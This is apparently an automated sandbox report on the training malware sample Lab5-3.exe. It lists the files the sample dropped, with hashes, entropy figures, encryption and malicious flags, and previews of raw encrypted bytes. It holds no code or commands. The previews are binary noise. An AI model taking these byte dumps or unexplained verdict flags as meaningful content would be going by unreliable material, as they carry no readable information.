                                                                                                          Preview:.gF.!WQ.k...2".^..S...~.rJ..Z.'7...&....+V.D$...Ut.nq....BN......S...G.....:.J.m3.f..4.0.@$.cn?,7.......t...-..i2..t..&...o..B._5@......&D..S.F..l6.EHf.F...../Nk.`...q..ni.h._.....o...?...a.-k...IXI.S....]D..YI}._!..D.....D0.].ET...v.<@.v.Q.Y...*...k..:.F .lps...9...'.p.\..&Z....;K..s....W..Y..j*.......y..F.m..c>...J.<......c...@.O~.&1..%.j.2H.z._..(.~R'....T..B8~....z.mnZp........$.6.f........:V..$.d...j".xA.a.G....3@....U....Y.a..;...>5*n.....I.Z...r...%.C...&?......?o.X).]...K..-.......VY........+g.......)~.B@,`n.#..<.O.p .k?C.q.}x.o..^...T..^R.0.].`.Y.y.-..H...n...'.>...*C...I+..j.(E.......].Er1.....D.W\..w.&.sg...`Iu.hC.#P5..@u.Q..HX. f.oBX.0..T'....d.DeO..Ml.l.....P..}. a/..dV....)(...h5.5.M....J..X.w.F..%......xZbo.K*...2.+.T.7.......-.j.y..U.....u.).w~.....>.o.1.Zt...26.....S3..I.z2..=..S*x,.../.QY...\>.Y....U.Wr.CK..O%....^k...s6{.....E^P..|...$.f.......%%.Q.4...U$^....Js..4./o.a......YXt...Y.CE..P........YO..^.T. ...x|A.6@.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):45376
                                                                                                          Entropy (8bit):7.996204433296989
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:+EOsBQcZM4kIg8uU9jtww5EEaws1ZpUps0rtLA2Ac9T7T/1U58WRDpzgRjgEaQge:vpZgIgsSGsvpUq0LAc9T7T0bpagrQg5Y
                                                                                                          MD5:92E4220616A45D6D980C2A238F928E59
                                                                                                          SHA1:9C4A502EB5469996D363F63C601A668BF9ADEA8A
                                                                                                          SHA-256:B0700BF9061763F666EC54EC94977EE5D87B8CFA20DE833A32B04A350CA91076
                                                                                                          SHA-512:A2B36F6E13EDCECA68755F5341E2F7141C6609A451F70E7E5B48707DD0C17116341A3BD0E89E08730BF7DBB50E6C7DCE1E34A71EBD91CC07FC16165FDCF3161F
                                                                                                          Malicious:true
                                                                                                          Preview:v.j.[.5,Q.v........6*.1.o.....,...^<>k..U..>.N......B.e..}.k.g}.'t..T^.(.....-.H.$....4.....w<.3.Y|&.....d.6....g.)AH...u....EU-.......I.].Q.S..m.L.3.'..i..mO.}.>o.+...P..c........M..A.(... ..!.p....[..H.w[>.cU..4..Y.71:f.$.k.|..?....(w.%....mN?.....<KGG]..Ut.99.0.md..]& .....G ..a.@+.d4`....d1......}.tu......C.".\9I.u.r%t.P...Ga..A....+eNd.||[.CF}....z..eLp2........~..?......$..^....nf~.4#.g....U.M.U.......D.I.....m.{(...FV..e...2.....K.}16I{p.J....Z{[,o.K...^g..[...:..2.h.+.x7."#_...<.......!.2e7B[..'.o...|}..N.{...`...M....9j.A.8..pcw.B\.1.u.a..{..$.er...*..eu.g...(A..D...#.D.M.I..&..?.O{.j<....E....."N./.=..C.....x....n....z_...d7.x...f..r..-.WL/.}......3....T.R.{'..>.W..l{.......c.B%..%y...0XL..K]....F.I...u. ...:.9...*.......E..._.....7#..,.N(k.j.../.r..r.r;5..00{.4.....Y`r.`..V...q..p....G.c.~.....a%...}.1,.cbwJ..D.^81...^K.3.!...@......l)..P.&=U.#Cjdw~Z...#.R..o>|p.D ;nwQ....E!T.u.2.?j.{.q..L..?.C7a9.....m.Ts%<b.....|.<Y...T5|..?.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16640
                                                                                                          Entropy (8bit):7.989555084092578
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:zIxQzRiohbtdYJiPZRTUgEeOk5vWEQdtudVtb:DAofm0hRTYAxWEQoZ
                                                                                                          MD5:54F94ADA9656B76906FC258E11E7F7F2
                                                                                                          SHA1:2C67A79B5E17F95330BA1C344B471CC531AD134F
                                                                                                          SHA-256:8D052B62147BA2FB30B3475DEB14C1353E5C241FE8D0A9B6828BA238AC9FB754
                                                                                                          SHA-512:FC4F7A8829C7649467C585F38B3DAD69CD0A894687C98F4D503B279AB187E978D616FF5C417F9C537CF7923E6D0AACF93DD3012CBE90D26D7CFCA775816DA036
                                                                                                          Malicious:false
                                                                                                          Preview:.e.wk.....!"..3.'d..]..^.a6.l..4,@4g%.I...F....J.j.7.F...$..Sk..p....M...nnx2.h....|w...V...|.../..f..X.......B@..5W/}o..ae...&..De.UIj4.!89...;v.....B...OXc9...<..R*......Wv.T.ij.<W5.._.V..L.5..@\'....P..)..a....`.=..M....jJ...72....G...a...^f.O.h...LQq.......AV..N&.2......Q..m.%.F%...-.d.........?./..8~.......+Q.:}..^..I.h.............=.o...0.ij.!.#.0..........G2.Tk...~!..0........K.....J...P..T........@uN.D..L.t......g..{.4.....k:.K....].Ns&..O.x...!.=r}g2..Q yK..hA.......u.L.S..9..7./..n...Z..=)...M.t..g..T.....e.L.C..[.({J.9h..P:qz.N..N.]w...Jfz...e...[..b.S+.pK\,.=.W.@m|. S.......6c.(..~.S.p^Fp.}f)g.rY.`)..C....e....cX.].G...~;KuID........2.}...m .......G..C.D..u....=.U.."^p)s3.$......&.#".u.q.L.4oH.[T.W.x.....'.FUST...`EC...<..>J^4.....)-v.....Wq..*}`..9.s^..].,.....[l...f...l<..{ .....x*zb....T.....K.7..&..i.B.....|.L......j....-1......+#._....Z}.@...A.(..=..../gY60?..P....+...#B#..0?/vD.x.W. .*.V......M.Bh..N(..i[l.....<wVZ.d.q.....j.@..8;....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38064
                                                                                                          Entropy (8bit):7.995196036921859
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:Sqv0CrHCTdwBJwDlxf+Kr+Dt+2aXu/3KSxKlAa1XGbk1MKWnZ:vcCrYdi4mt+28u/6SxKlAwGgiZ
                                                                                                          MD5:31AFA609151437080134EE9774C306C8
                                                                                                          SHA1:522FC5D925A25CA5D26708960416411FABB59D1D
                                                                                                          SHA-256:1FF68B7E23F8A995818F788A253F44F692823FC73D22C644778864594C966BE7
                                                                                                          SHA-512:2D237DA1829FE3DEE715D9EFBE17961BCA76230FDBD19FDDA5F98C19547896FEB113BC8D0A4B4C9A221021249A03A66EFFC5A56F65EA45DF4EE1F8F53E1DB4F6
                                                                                                          Malicious:true
                                                                                                          Preview:."...a.....Y.._G......}T.^......@uQ..C.......C...!.g.....V.s.(.....a..G57A..{........Q{r...T..Z#.|e.c..=..n./...,.%1.."a..MO.|J.f...`.#..I....._.UB..v..c....s2.o.*.j..U..0s....t..Yj....!~....>......S...(.F......G2.?...%%S.t@.B.g..z..F-8.....y.......M.qcV3.....K.w..^......./...G2P.io'H.&.....D@i>....`.p..&......+6..P%v.)|P.G.L..........p..u...R.............j0.^v.....-.9|.-b...d....O.Td...FM..w. .zB........X.!K..4v...l...|V..O}`...hw}^<.t_3.c....m.+...E..%.S.]....]L."F....._....Y.....@...8.....$...lu..../.<.....[..fv._.0.I....?9`..;.\.#=..D..2y+...6...TBU.9.HB&...a.._g..].*o.f..fa..X7.V.....o.i.C..2...7..wJ....g4.z.$....8lcY.7.`/......T...'...=h..^.j...4a...=....O&.....:.w}J..H...46;h.o.....[...*......#...Z.^F...f...akx.[.w...u.xek..P#.......I.3.~;1\w&...c!.#.c.Ed..X.O.h...B...?..9.a..(9YW}..i.s.Z..R._.G:.q.y...bs.y.....ves!...5.(<X.\8j..Q.j.M/....G............J.w.i(......\..q;.E.O...,GV......X9H.L#.YQ...A.b.E.U.(.D0r...dj+.Xh.k.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13328
                                                                                                          Entropy (8bit):7.986198197540962
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:y+c6x3E3ZhdqD36d+26WkhSgErVwjidPxxsPmtb:pcXhdi3AhkhkrKj65iuZ
                                                                                                          MD5:DA56C7028D476623E4887A4C61C3367A
                                                                                                          SHA1:3253A73E50E437FEE95CE92FBBEFC3862D09CF74
                                                                                                          SHA-256:8950827DBE36ED31263A1943799266294A3AC709200BD0B245AEA4261353377E
                                                                                                          SHA-512:A995F2DC1CD8E121B38380B652C665FEDCC92B6C9913A6B477446274024D30A18624CFA3F72E1C523DBCEF66CA70F35A25D52576C372F1B9C1A50C63EA287187
                                                                                                          Malicious:false
                                                                                                          Preview:....J..$.K....s.QM....?..f.....^.`LS=..9.3:o..@..*!..@-E..so.t.]...!#..!.\..(....7Kr...c.....v.B..,.....0.J".o..W.=.....4.3C..;.".Y.".....d..T.'.V.........<...g....fC.G{6...L.......>....+._...s..t.w.....E....b..qOT..Z.i..J.N.....v"..&.t..#.|.?<\W3\=J.?\..(.X...N.Hm)...P.....OFE....u....qECgf.r..e.j..".!!.fdE)..\...l.D....C.S../.D...........6.....*.o..|..SiF[e...........5..(.Z\...b4....IK....n!k...PNY......3.D6..)... ......b ....'...T=....Z.M...B.....fTo..2!.i(..MC....n.....;(.IU.+:9.K...C......;a$.p..$ve&....CEg<&. .bS9....k....p.1.Gn.......#UI.L..q..4.&U..g&..(.G..]..7.&......0..1...dc....s....!....;=..A>g.Vk..q.V.^.O.Inf.#....Y.h~.e./P...w.[.\....o5f...G..?.^......0^.z`...v[..<X..i.d...W/.n..j...t....1|.g......a..?0.X...ETt.ne....G...Z..Jb........_...+n.7../5....gt...x/.....3..]......*..w#........E?.=.O}..9...?eZ.c\\...N.n.T. .!o..P.nIc.w>o.|.>f.r>....8*.^vs<.>.d.'l.....L...X-...]L.O.Y...]h..n.XE.K.....Q......K...E..!/..>O^.df..Q.4....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):67584
                                                                                                          Entropy (8bit):7.9973716841590905
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:d9NrVOwtkN6Nw0sILw7hN/jJg1SzPnwg3p6m3lQvzALvXHuazrJaXZ:d1OOkN6QILAhpjJeSzPwg3p6Sk8Lvuaa
                                                                                                          MD5:9DDB327115819D78E829E99258162FAE
                                                                                                          SHA1:7B6F149D04E4E313B62085AC96315BF5F07E81FA
                                                                                                          SHA-256:D4A6DC4EFB683E10E98F9A449376A0ECDE037187DF2736B71EF7044B65E893C6
                                                                                                          SHA-512:A82C4472C8D1A66951D3A84E84B1E300EA70B14A375E78DEDA3570075C07E078095BC11FB217152EF058BE91958D7BA8B9B91376873F1B4489B80F6708CFE2B0
                                                                                                          Malicious:true
                                                                                                          Preview:u.z.s.>....J.......fMK#W..]..@H..u..0p.z..iOy..I(......%...4...C..a1......P.[.....q..B}.=N .g.1-.r.t......Uq.B..#.l+.....+..C.E.0..}.-.6PR?.v...y.>f.&.>9PB.....,..........|!.Le.N.......8.|.."z(<..@>....n...&.1.../K.D....9'..0Eq8.Q #lL.M`#..np(aM...Y\.Z.W.,J....(E...N+..Bl...n...m.6...G....D.45...........i..oa..m..]...n..#.V1..9...*|Lsq.....i.cy.4......aYou.wyU.W.^..U....o.....0_._...s.../6k:N.....h..=.......a?.y...hV}....;.Sb..y.x/..o.........D.1a.W.........HA&*.=<.|'y$:....TsC0.y}.l.<b.OS.....*e.[......'."...s.:.1.....Q.f..T..<....`........W.&;"B.......c.LVSF.>.......onow4......%.i7v...j.".qpq.x..9..'9....>....aK._....P.w.x,EJ...rf@..T.'./..J......#..;._C'#@bS@H. k..5......)....^`1....n..;?....-n.y.#.......Y.S).......... .&.,.+..4..m.(a..m....a.Y.f...gK.7...9U...a.}.;.I..1Gh...}..V.n>..v.VE...l ...8...^a.....Q..[5...FwP.....SL:Q.D.PV.p.>.X.........E..p....;....(...u......j|g..=sY.h.R..+..7.`..i..e$.8..[....l..6...w.E<...6.:..y..;N
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):189824
                                                                                                          Entropy (8bit):7.999117697391353
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:psPHIBiPv4P+YwShbfdtEuVgsvXRHvIOHn9QyNvQvhbVzfJEC/ltP49rf3m56ye0:psPtYNdqygsfFAA6h5zBD9J4p25jewZ
                                                                                                          MD5:888F301F0A4822913F1A4581E6588355
                                                                                                          SHA1:F83E556ED7F6030B1D383132633FAEB8AA1FEFA9
                                                                                                          SHA-256:9A3B343E5FA95EEE7CCF24277A1BF3A2996D2703FB0C4083D4ADFC0F1B371E9C
                                                                                                          SHA-512:0E1DD224DDCA03E28495196CBD5C966339EE2939BDE825F82012C63D502C2DE14913D1388A436A83459A1E28B95282770DD497884497DAF4E3E1714A58062AD2
                                                                                                          Malicious:true
                                                                                                          Preview:....U..........bU.N.x...<..gL...wk..2.k.(C.hY0.WVC.. .#...:Wt..Rb..Ib.J.^.P......$.....y.@t.^u.{...U35....Y..z.B.F}.......xm.[.....(..a_..'...O..}v........:...q.C=...u...~.....^......q.s%,.T.,...JX.......9W.5U..7\............}.J.YC.....[S.1.....E,....;...^w.2.....O.p.R.P.......c=c-.&+..%.6>XTf....<.o.z..%b.).....k...\..9V..C%...L.)$..."..&...O.F.=j.A.3..4z'Y.dX..&...f.%.q........Y.....!.{C.0...N..C=..#....8...M....u....]W.Q..e...6.c....HL...K].:+J.0.y...kma.....xJ....~k%......bB..[.l...n.....,,.M...nv.&....f....'u.Z;.(=U}.......BF.Z.:_A$...".P..6.Q...(.J.DkIG..N..~.2.y.t.!.V....sZ.G..................f.....~k..c....G...w8....O..Q}jO|....s.v...'..JKI...NE8....y..gv..n).....Q......P...4O}.f...%..|.5$s.B.F[l..v2.&2.l...ds...,....>..5...NI8o.A.O.#E..?&...bx.W.f..b....2..H...;.E.|..I.g..........o.U....D...y...o...k..Wt.@.O.._.....h..%.S...u..D..X..~I._..7.T..R5.&".....E;..~...}...<Bp....a....>9..7..K...;UQ.....0|...-....H...H_.^Eh.@`..`Nn.sMr..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9376
                                                                                                          Entropy (8bit):7.9826487411619285
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:KZz7FRQLNtKD4xOJOE5rUzOz/GzCUSN4uuSxiDAcRutU2dk0Cb:6fszRKDGzCpN4udx4RIItb
                                                                                                          MD5:3D6BF16854323B759CD64563EFA6A6AD
                                                                                                          SHA1:946EE26D6769FB3A2905CEF035FF0C95864A0950
                                                                                                          SHA-256:33C568D2D0AAD5556ECE6322E1E78B69EFCDD0FEE3C6CDA9B5997E7ABC55E810
                                                                                                          SHA-512:55CE42E82AAF9E1EBA44956BC313E4A7E278D54014A817796286BDE5933F3623718B27410ADE52A5B70EF102D040F9E6CD74B62C234E89435B08E3C01E2EA626
                                                                                                          Malicious:false
                                                                                                          Preview:..g........}.b./.....s.C..R..m.{.hU....?..F....B.....?6..Q.I..[.)..7........J..HL.x..Y.YTD....8...Q...W.2.m.G.'..~..`S..p.> ..E$.[<K...~.~..i.q.s.{.`..,Z!+........j...dl..D.7..^..b.....C...1.m...u.....gb({.<m..LG.....L.e..qL~.w...@..!)....+<>....Me.....2^)......b....|..E...T.........5.=.g.j@CG.K...............qI...j...Ms..vR..w..........>n.I...mt.>YR4U2....{.F.n.BWX.2.o.C.g.6..Q..A.....!...'..lV..5n..U...%k...b..A.iqe:.h.....d..20(..S;.%....}...'..x..T.}R.=.!~......8$.....P.......f.....>...g..w^c....... ..d..Wz..6i..l.t.G...j.>.C......."].e}"&P...s..r.W.i..$.......s.JK.6..=....k|.X2..y.=!.\#.7..0E.1vf....!.4.. .X..e..^.V2=6.Ne&w......-.2]...M".Rq...gn...Yb...$...H..........".E...}^.._l../.K...Le.n..>...]nh~t..~..D...]../axu....#i...~0Y....."K..U,4...(N=A.....0u..+..L..;t'.HQ..jO !.a.$.w........l.bI.;..I..h_..(nM.ju....ud..CU^MN.>UiCZ.v..3K.&.....PJ....o..kt.|272`.|2y.. o..C.F..N...B...;.j......a..Y..nL.}.A....].P.*..'.67k.xHgD ..4...9...hsf3$.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5424
                                                                                                          Entropy (8bit):7.966795910842483
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:HQtx9BtkyMupMR9PcoLSBALQBEgdOzgmXqUG+UbwuAnw/IxGx0uKeY2ElUJ:HQtD8y/p6Jc6Sq/dg2NG+gJ0cIK0Cb
                                                                                                          MD5:5902AB78291989E95161F71363295362
                                                                                                          SHA1:8EF7734A4B61EAD6AE9CCFF70A1781B8EA410250
                                                                                                          SHA-256:46D61BFB5623286390D8B08282C8032914344F4605662E34C26121D51C0E74BA
                                                                                                          SHA-512:959F79F2A7A190DDE570AA4263165887D5B2B0BF096FAAE45807F04AC429F90B0B178B416ECF37FD315E8A06D138CF6FD4DFA08241F05627BEF3F52C16B60C16
                                                                                                          Malicious:false
                                                                                                          Preview:.E....J"d|....%5.. .....9..[......S......c..%...L.....+.p,........,D.r........B.#`.;...._n.M6..X.m$......W<r.y..(.q.....TkQ1Oo.K.-.G.E..>}.sv1....|.p.>._....'v..(aQ.....~.r..\g..<*Z&....B.2>52.h..o....Q..KO..v... q...C......K9..Fw...Zh.....=..S:X....%@lW.d...q.w.'@.O.. ...N~.1..f...E.^bH..l...ze...'...=..q.Bc*H6z<......(h........e...'x"...8eu. .$*...G,j...u..V.b>;...).]a.7........O..C..Md...aV...z.....!9..ui[i.dl5.S}.:X.L}.Y0.C...w.~.vo..B.p..P.%k.|..k5M...x.fR...\............])...L......o&.. .Z6..(4.....1h~....'.!...[o..;...9.D.X9.2..()............8...&`2.m.W7.H./o...~...d..f... ......@_..u..j..w....@\.H.a..B.b.s0..5.Nr.Ww,?......z.F..*....}2.S>Le.`.~....|....2.m..v"...$.M*.1.xk.r(.1...Q........ ..%.fPO^S4..E...l.-&..I`68...9$}k..K.....l.{n.'........F....Ic..R...g....OeEOI:.b%....u.=k.5......l....{..7...b..f...*........ .=...,.{..H...$...=/.*j..?...[..@I['......$'.....S...F....Tq ..vY..A..E.lu.f.S.jF.>...}r.H,?u.h.....$;q6I....|..@x..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5424
                                                                                                          Entropy (8bit):7.966486974576927
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:emvy+jP6j6Jz7OBOiI0Jc+t4geVtOs3tbalnH1lMhhbFLpC4QvFHxGx0uKeY2Elk:eEyy6j6JzCDcZgeVt/alHfkbVC1dHK0a
                                                                                                          MD5:107601D669C78259BEEB07BB7515C119
                                                                                                          SHA1:613B895DF770C768197DD90C26DDE530769D26C4
                                                                                                          SHA-256:F395FAF237435975AE450F37B4A48BB9C734165CFFFD5501D5C07BEDC5E73911
                                                                                                          SHA-512:6225F846E891EC8360558786045DE30A0C87CE02F40E2D5B993DA070FF528ECE4179969600A5B88B0EB6A2AEC6950E13D728D930F0B0997A1EE8455DBD5F7031
                                                                                                          Malicious:false
                                                                                                          Preview:...3y.x......k./.L....h...K6lOu^,~..W5.....Tp.;.."..e..\.;..uq.'.N2Q1GQ.P].kt..C..../..H.n.........L0...^..Sj7$.ae.....-.*....%x..O......d..IiAJ"1.|.t..LAE.z.R..8..D*W...0&.../...?/.....G..#.."Fv.(I..;.*.d..<..@...~6!...k...MD..w..neG...g.%...U*..g=.4...L........[:Z.Q...U..B.....v.....,^..h.MVF..B....5.h..z9.'8g....A.Qs....|...^x...C.../V....&/.&..t~k.J.>'.C.o....PK<x.lN.a...P..5I>".......".3X|...*Df.+:.$...+..L6....]...y...>CtI..E`2.y.J.P.......k^_..?.g.-E4I.BY....9u&].N....../..R.....E,.w.....f.g./.{.yi61A&.-.)I..[?....~ ...C.'..t...8r......N.L.7....Tdx..F(?....R..M.+&...UJ+....7...=|T..x.#,....,..!.0...-....}..u...i.,.Q;...>g(.O.e.AO.....*.S`.....Jv..4...w..U...dE0M......w..$.i=..<.\.t..T.d;5I.........*o'f.N6...-...H.6 _....Oa..d...U8....O...xajt..w.+c....J...-U][H..[.4'`J..G..gD2rK=......1n.gwe..Uc..i.<....1...p.b.~..V....Ug.d.B.9.}..h.r.@.3.4*H{h..Pw".YE4N=..q-F.K>..%..C..m.'...tY....4.Tx.G....x...2..V.C....i.....`.....w..#.......6
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5600
                                                                                                          Entropy (8bit):7.96326114366668
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:B7aDjkCmDo4+am/lbUvVYs0O93i8gXEtFxRG8IBmUjpC7e2T61AGx0uKeY2ElUJ:Ldc4+am/cCNKZG8cfpCtTgz0Cb
                                                                                                          MD5:A5EEBD2F07B9A0022B7159CB74DE89D9
                                                                                                          SHA1:907DC787CAFFF9A08B9704F94D860CCEADCC4F48
                                                                                                          SHA-256:E3D3E12DF49C82046F4D58E5DA13CC8DCF133857C1078E4B1C9B691515CE2B3B
                                                                                                          SHA-512:BF4FC5D8FEAF61870C55A0D56D4150950CF00F3FBE5AF0930DF77C209BAD0011213AABC86DDF5A0C11ECC9CBEFEBA0D91CE7A5FF05BF93740D3914C21E190963
                                                                                                          Malicious:false
                                                                                                          Preview:.W~|.f.xq.'(.Fh....&z./....?...vnA...../.%.:...&.!.*N...Q%.n\...E..8#(.`4z.<L...e.B.............L.W~U]N....ZK.......2.... .....:..|n......c..<./.f>w.)!..N.(|M.Gu.......@.%E.ak....=.F$..^.~.C.....W1mT..A.dW...@._}{I...C-..0..".r.R.X...%hW....q.Ah,..U..%5_!.,..h@%..s. ..b...)[.8UrvV.M]..f.'......."..,pDj.ky....`].....@.(..$.V....c....U1.......*.d\RI7........*..Z..=n....6%.<if7|..G2..#.<..ldC......4B..9N..wR..p.M.(M.+..I......C...~.!.?n..E..M(.LM....}.N\...N..c.pG.&...MG$..'....&..eY..w...#=..W.D.S.`..ze......;..:.&..<.u..~.2....(^..I.e.....i,.."...>..~...$.{.7..$>.....zg...K4. =..TF.9..<n.:9...W...V..:.Y...N.p.i.+N.pdz.I.s@D'.f.... .....8.....%.2....s.O.'K...:....pf..\.E.V.....~....Ol...o..j! .....f...7...t....N^lbw...=|mi7.......Q....,......T...W4.......iXN.....l2.u.L.Z......~`8m.|Es..&'|/...1Y....B....3....?s......B.Z.........*.|.G._.6&..<.1...Y!..c..q\q.6...9q.w4..aG/..k.L...g.Y2....#....B.?.zi.,...Cr"A.. ".......-BY=I.F........O.Pz.hL.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM, 0x8C-variant)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5200
                                                                                                          Entropy (8bit):7.960862898795386
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ok0HmJ39rPq1ZyDw6QlhJEJ90MZJUuG1mF45PnEFGGx0uKeY2ElUJ:ovHem1Z16sNMZJUBcFkPnEFF0Cb
                                                                                                          MD5:A422399F45C58FBA9EFED2764C83481D
                                                                                                          SHA1:24A00ED8D83A7E4CC76FB375878D373FB35EB7BC
                                                                                                          SHA-256:87C2F4803083030EF990AC2312ED412F5E99200AE95907329EE965ACB0116C63
                                                                                                          SHA-512:5FEEBF51E8BC6B4F25D3B23D6123E6DB9ECAB9095035949A9CE729E0F399CF06E9F596A682527B138DA88FAFD01E8618A96C611D790D40F7CADEF3DDEF59CCC1
                                                                                                          Malicious:false
                                                                                                          Preview:../c.D.zp..x........p.e.o.|.W..M...CX.I....4.-.%;...%.~x.....$.*,B....m.V.X........(.....J..Q.....=Q..UC1..........VJs...z..*....jN..3d.._,p.s&W.....b..+...S.#..uqp..0..%/N....oU.4/......psT...A.....|.7Y.${+.!|..]....1d$..I.[gV...H.:+.9/..H,......j.s.~...." ....].9f1..........B.F..b..L..8..iA~...H..Hk...u4^r......i........I.(..6...!=9p.;.5.4.d....R.'...B.vv~...L..H,`.O... .@..........!..(X..5zO.9>0i........e.Z+../.?LT.v.j%&."...u.....V.%- w./.-=Rf..;)...w....R............]..[.)&...mM_.$..Ci...u.p-..50T.m.....o.0FE..'.I.Z~.LTKz..T.."...X...y(.n}..H....<.H..#.C...... .?.E...B.v...s...~W<...Ei..^o........].Y.......^./T..A.}T&.x!B8b..(..J[.I}........l..[.(..pJc.E....w...7. C .&....Q...M/;.r.{..w.qT................#.)..*d....\m.G=......+...>..v...?.S..%iB...T...t...:-...9...P.u...t<V.sa5.n..f....9.Z..[...p%bU...[&g.v....ci$9[-[...H...8".~..>..].B.K.......4.....@|w./&.poJ...pNw.y.&]...:....C.*....n......E.;..Y.3..*.w8[..~BAb......*y...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5184
                                                                                                          Entropy (8bit):7.957491010514009
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:slJZV1F0zV7NwYm6l8RB4Fp4R4UNwE3l7sjNCAqGG2GW3Gx0uKeY2ElUJ:GDV1wV7NwygiFpLU+ktXPGG1Wk0Cb
                                                                                                          MD5:FE8DD14A2DE56BDD06EF356AAB3A125D
                                                                                                          SHA1:A8DC050D454D8BEC773C1C1031B0F58CCFDC9A48
                                                                                                          SHA-256:8101EE1A6A5CF75BD6CEC11B7F5DAD122517D672B590A4EFBDDC1323FD74468D
                                                                                                          SHA-512:86E4F04C33CC4CB17E5855BD0514B92162F4B294669F38B6C4D84242C0F5B90676233390732FA9E74D8850D43BD0D865131EDF501C781D246DF584FF9215191C
                                                                                                          Malicious:false
                                                                                                          Preview:M..p..\>..Z.....+..oW6.*.bMl.o.o\...Y.O.L_..g...4.^....`=.......T..{.PH..4.;....n..q..o...p..`d..L..(. ...T....0.|.....1.N....I..#%_Q.T..).2%...:Fq+...b)...A&.......R.,P..`x^!...!g.w.....?.:..R..>.....2.!.l..I..m..z.P..r._.......fl$...j".z..?D........T|.h.`.o;...>..)..MJzD.....0N..M...Z..9.Y...6..^:...W.H3...K.`..E...)|.`.....{@..}...a8f?......l...C.eG.7.j...#b...f"s\v...Hn.k@..F#....../H..=n.9...SV.!.Y.=.6{...#P.#.f...Q..g/-5H........Z.#.~.G.V.w.-..Y".f;.z=....#.+..x..s.%...qfkg...7....3.v.......4..JJ.....#....&h!.|tz.Zg...t.`o7..x.....H. ....{7..........o.|.E....W?.........sh... .f...cgZ...~...W.3.Sd...q...rF..w.r......3.C.....Y...Hh..._.c..)B|(.e......J.M.U7.Si!..$$K..4..#.....xd.5p.+.o....U..g5..u.+.F;:q.3.}.j.;.a..L=K..q.hg._k...T.ej.:..Q.C...7.PY.?.A....._.w..AY..m..`.bJ.63....;.S....^*~o..@6].I...>.=.5..v.l.".~....|..@...F.$hl..7_)Q5+L=U}......i..f.."...^.I..i.h.{......v..e..A}.....!...5_@i3.....ki7r....9...'#:...wG
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5440
                                                                                                          Entropy (8bit):7.971171975966952
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Qe955xRpaBiFjOzlM9QuGn4k3ZeeQoLcytLeS0LwVKLdxwGx0uKeY2ElUJ:X9XOwOJMDE4kYeJYcLWIKLdxD0Cb
                                                                                                          MD5:40C6FA60CC0A7916009EEBD483070D28
                                                                                                          SHA1:1A1F0A96BA3A3CA7164C8D9B58231B0FDA26EC0A
                                                                                                          SHA-256:9B2F9A772C919B8846897E0BA1A4D139B185E7DCC99CA2D49A9903EFB2C2040F
                                                                                                          SHA-512:2F10C9C99A5C256C4C6BA36CDFEE10DEF1A05BEAA66F9DB5EADDE2BE196D8D4773309DA4FE2295906435E33A05D23C752D02B12B9010E249FB999DE3F01AC853
                                                                                                          Malicious:false
